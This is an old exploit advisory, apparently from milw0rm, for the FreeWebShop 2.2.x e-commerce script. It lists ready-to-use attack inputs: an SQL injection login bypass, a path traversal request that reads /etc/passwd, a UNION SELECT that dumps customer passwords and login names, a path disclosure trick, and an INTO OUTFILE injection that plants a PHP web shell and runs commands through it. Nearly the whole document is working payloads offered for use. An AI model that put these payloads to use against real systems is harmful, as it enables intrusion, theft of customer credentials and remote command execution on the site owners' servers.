28 lines
No EOL
773 B
Text
28 lines
No EOL
773 B
Text
Product: www.freewebshop.org
|
|
Version: 2.2.x, maybe lower
|
|
Critical Lvl : Highly critical
|
|
Where : From Remote
|
|
Exploits:
|
|
|
|
Bypass Login:
|
|
username:admin
|
|
password:' or 'a'='a
|
|
|
|
Read Files:
|
|
/index.php?page=info&action=../../../../../../../../../../../../etc/passwd%00
|
|
|
|
List Passwords:
|
|
/index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,loginname,5,6,7,8%20FROM%20customer
|
|
|
|
Path Disclosure:
|
|
/index.php?page=info&action=../../1337inexistant
|
|
|
|
Create Files (needs Path Disclosure):
|
|
/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'
|
|
/langs/uk/fork.php?cmd=ls
|
|
|
|
|
|
Discovered by Spiked and anonymous.
|
|
irc.geekshangout.org #backup
|
|
|
|
# milw0rm.com [2006-11-02] |